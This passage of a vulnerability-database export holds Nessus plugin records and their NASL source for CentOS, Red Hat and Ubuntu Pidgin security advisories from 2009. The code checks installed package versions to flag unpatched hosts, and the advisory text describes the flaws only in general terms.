audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:25:44", "description": "Updated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.", "edition": 28, "published": "2010-01-06T00:00:00", "title": "CentOS 4 / 5 : pidgin (CESA-2009:1060)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373", "CVE-2009-2694"], "modified": "2010-01-06T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libpurple-tcl", "p-cpe:/a:centos:centos:pidgin-perl", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:finch-devel", "p-cpe:/a:centos:centos:libpurple-devel", "p-cpe:/a:centos:centos:libpurple", "p-cpe:/a:centos:centos:pidgin", "p-cpe:/a:centos:centos:finch", "p-cpe:/a:centos:centos:pidgin-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:libpurple-perl"], "id": "CENTOS_RHSA-2009-1060.NASL", "href": "https://www.tenable.com/plugins/nessus/43751", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1060 and \n# CentOS Errata and Security Advisory 2009:1060 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43751);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-2927\", \"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2009-2694\");\n script_bugtraq_id(35067);\n script_xref(name:\"RHSA\", value:\"2009:1060\");\n\n script_name(english:\"CentOS 4 / 5 : pidgin (CESA-2009:1060)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-May/015891.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f0ad1a5\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-May/015892.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7b25971e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-May/015937.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8266309b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"finch-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"finch-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-perl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"libpurple-tcl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"pidgin-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"pidgin-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"pidgin-perl-2.5.5-2.el4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-perl-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-tcl-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-devel-2.5.5-3.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-perl-2.5.5-3.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:06:45", "description": "Updated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.", "edition": 28, "published": "2009-05-23T00:00:00", "title": "RHEL 4 / 5 : pidgin (RHSA-2009:1060)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373", "CVE-2009-2694"], "modified": "2009-05-23T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:pidgin-perl", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:libpurple", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:libpurple-perl", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:pidgin-devel", "p-cpe:/a:redhat:enterprise_linux:pidgin", "p-cpe:/a:redhat:enterprise_linux:finch-devel", "p-cpe:/a:redhat:enterprise_linux:libpurple-devel", "p-cpe:/a:redhat:enterprise_linux:finch", "p-cpe:/a:redhat:enterprise_linux:libpurple-tcl"], "id": "REDHAT-RHSA-2009-1060.NASL", "href": "https://www.tenable.com/plugins/nessus/38872", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1060. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38872);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2927\", \"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2009-2694\");\n script_bugtraq_id(35067);\n script_xref(name:\"RHSA\", value:\"2009:1060\");\n\n script_name(english:\"RHEL 4 / 5 : pidgin (RHSA-2009:1060)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1373\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1374\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1060\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1060\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"finch-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"finch-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"finch-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"finch-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-perl-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-perl-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-tcl-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-devel-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-perl-2.5.5-2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-perl-2.5.5-2.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"finch-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"finch-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"finch-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"finch-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-perl-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-perl-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-tcl-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-devel-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-perl-2.5.5-3.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-perl-2.5.5-3.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:43", "description": "Federico Muttis discovered that Pidgin did not properly handle certain\nmalformed messages in the MSN protocol handler. A remote attacker\ncould send a specially crafted message and possibly execute arbitrary\ncode with user privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2009-08-24T00:00:00", "title": "Ubuntu 8.04 LTS / 8.10 / 9.04 : pidgin vulnerability (USN-820-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2009-08-24T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libpurple0", "p-cpe:/a:canonical:ubuntu_linux:pidgin-dev", "p-cpe:/a:canonical:ubuntu_linux:pidgin-data", "p-cpe:/a:canonical:ubuntu_linux:finch", "p-cpe:/a:canonical:ubuntu_linux:libpurple-dev", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:finch-dev", "p-cpe:/a:canonical:ubuntu_linux:gaim", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:libpurple-bin", "p-cpe:/a:canonical:ubuntu_linux:pidgin-dbg", "p-cpe:/a:canonical:ubuntu_linux:pidgin"], "id": "UBUNTU_USN-820-1.NASL", "href": "https://www.tenable.com/plugins/nessus/40752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-820-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40752);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-2694\");\n script_bugtraq_id(36071);\n script_xref(name:\"USN\", value:\"820-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 / 9.04 : pidgin vulnerability (USN-820-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Federico Muttis discovered that Pidgin did not properly handle certain\nmalformed messages in the MSN protocol 